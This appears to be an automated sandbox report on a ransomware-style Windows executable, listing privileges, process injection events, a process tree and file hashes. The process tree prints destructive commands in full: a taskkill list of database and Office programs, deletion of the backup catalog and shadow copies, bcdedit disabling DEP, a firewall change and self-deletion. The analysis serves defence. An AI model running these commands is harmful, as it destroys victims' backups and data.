description pid Process Token: SeDebugPrivilege 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Token: SeTcbPrivilege 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Token: SeTakeOwnershipPrivilege 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Token: SeSecurityPrivilege 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Token: SeDebugPrivilege 4748 taskkill.exe Token: SeBackupPrivilege 6060 wbengine.exe Token: SeRestorePrivilege 6060 wbengine.exe Token: SeSecurityPrivilege 6060 wbengine.exe Token: SeBackupPrivilege 2848 vssvc.exe Token: SeRestorePrivilege 2848 vssvc.exe Token: SeAuditPrivilege 2848 vssvc.exe Token: SeIncreaseQuotaPrivilege 5980 WMIC.exe Token: SeSecurityPrivilege 5980 WMIC.exe Token: SeTakeOwnershipPrivilege 5980 WMIC.exe Token: SeLoadDriverPrivilege 5980 WMIC.exe Token: SeSystemProfilePrivilege 5980 WMIC.exe Token: SeSystemtimePrivilege 5980 WMIC.exe Token: SeProfSingleProcessPrivilege 5980 WMIC.exe Token: SeIncBasePriorityPrivilege 5980 WMIC.exe Token: SeCreatePagefilePrivilege 5980 WMIC.exe Token: SeBackupPrivilege 5980 WMIC.exe Token: SeRestorePrivilege 5980 WMIC.exe Token: SeShutdownPrivilege 5980 WMIC.exe Token: SeDebugPrivilege 5980 WMIC.exe Token: SeSystemEnvironmentPrivilege 5980 WMIC.exe Token: SeRemoteShutdownPrivilege 5980 WMIC.exe Token: SeUndockPrivilege 5980 WMIC.exe Token: SeManageVolumePrivilege 5980 WMIC.exe Token: 33 5980 WMIC.exe Token: 34 5980 WMIC.exe Token: 35 5980 WMIC.exe Token: 36 5980 WMIC.exe Token: SeIncreaseQuotaPrivilege 5980 WMIC.exe Token: SeSecurityPrivilege 5980 WMIC.exe Token: SeTakeOwnershipPrivilege 5980 WMIC.exe Token: SeLoadDriverPrivilege 5980 WMIC.exe Token: SeSystemProfilePrivilege 5980 WMIC.exe Token: SeSystemtimePrivilege 5980 WMIC.exe Token: SeProfSingleProcessPrivilege 5980 WMIC.exe Token: SeIncBasePriorityPrivilege 5980 WMIC.exe Token: SeCreatePagefilePrivilege 5980 WMIC.exe Token: SeBackupPrivilege 5980 WMIC.exe Token: SeRestorePrivilege 5980 WMIC.exe Token: SeShutdownPrivilege 5980 WMIC.exe Token: SeDebugPrivilege 5980 WMIC.exe Token: SeSystemEnvironmentPrivilege 5980 WMIC.exe Token: SeRemoteShutdownPrivilege 5980 WMIC.exe Token: SeUndockPrivilege 5980 WMIC.exe Token: SeManageVolumePrivilege 5980 WMIC.exe Token: 33 5980 WMIC.exe Token: 34 5980 WMIC.exe Token: 35 5980 WMIC.exe Token: 36 5980 WMIC.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4300 wrote to memory of 4912 4300 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 82 PID 4300 wrote to memory of 4912 4300 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 82 PID 4300 wrote to memory of 4912 4300 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 82 PID 4300 wrote to memory of 4932 4300 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 84 PID 4300 wrote to memory of 4932 4300 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 84 PID 4912 wrote to memory of 2936 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 90 PID 4912 wrote to memory of 2936 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 90 PID 4912 wrote to memory of 3376 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 86 PID 4912 wrote to memory of 3376 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 86 PID 2936 wrote to memory of 1372 2936 cmd.exe 92 PID 2936 wrote to memory of 1372 2936 cmd.exe 92 PID 4932 wrote to memory of 4576 4932 cmd.exe 91 PID 4932 wrote to memory of 4576 4932 cmd.exe 91 PID 3376 wrote to memory of 4748 3376 cmd.exe 93 PID 3376 wrote to memory of 4748 3376 cmd.exe 93 PID 4912 wrote to memory of 5972 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 101 PID 4912 wrote to memory of 5972 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 101 PID 5972 wrote to memory of 6024 5972 cmd.exe 103 PID 5972 wrote to memory of 6024 5972 cmd.exe 103 PID 4912 wrote to memory of 3480 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 107 PID 4912 wrote to memory of 3480 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 107 PID 4912 wrote to memory of 3480 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe 107 PID 5972 wrote to memory of 5936 5972 cmd.exe 108 PID 5972 wrote to memory of 5936 5972 cmd.exe 108 PID 5972 wrote to memory of 3512 5972 cmd.exe 112 PID 5972 wrote to memory of 3512 5972 cmd.exe 112 PID 5972 wrote to memory of 5980 5972 cmd.exe 113 PID 5972 wrote to memory of 5980 5972 cmd.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe"C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe"C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe" g g g o n e1232⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\System32\cmd.exe/C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\taskkill.exetaskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
C:\Windows\System32\cmd.exe/C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Modifies Windows Firewall
PID:1372
-
-
-
C:\Windows\System32\cmd.exe/C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE3⤵
- Suspicious use of WriteProcessMemory
PID:5972 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:6024
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:5936
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} nx AlwaysOff4⤵
- Modifies boot configuration data using bcdedit
PID:3512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5980
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe/c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\system32\PING.EXEping localhost -n 33⤵
- Runs ping.exe
PID:4576
-
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6112
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57bf5504493e7f57fc33f3a57a63661b0
SHA1624830040ff9c8856c9eefc6c34ecab242272d92
SHA2564af73b1d4a6eb3d84ad3119692b156763c8616c19d671632b8afeb90878f3285
SHA512abd07cd6eb2f4e7d93f7987eba0f9b18712db78a1e29c50456b871d9d91491328cd88846feaa712763ac558bc35081aa2535a046f99c61fad50462fbeb17cc0e
-
Filesize
225KB
MD5f62590e838b1d13960abb6b363e03ed9
SHA166f706a7d39038964471e0a009a76e0f978fb075
SHA256fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3
SHA5127d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556
-
Filesize
225KB
MD5f62590e838b1d13960abb6b363e03ed9
SHA166f706a7d39038964471e0a009a76e0f978fb075
SHA256fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3
SHA5127d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556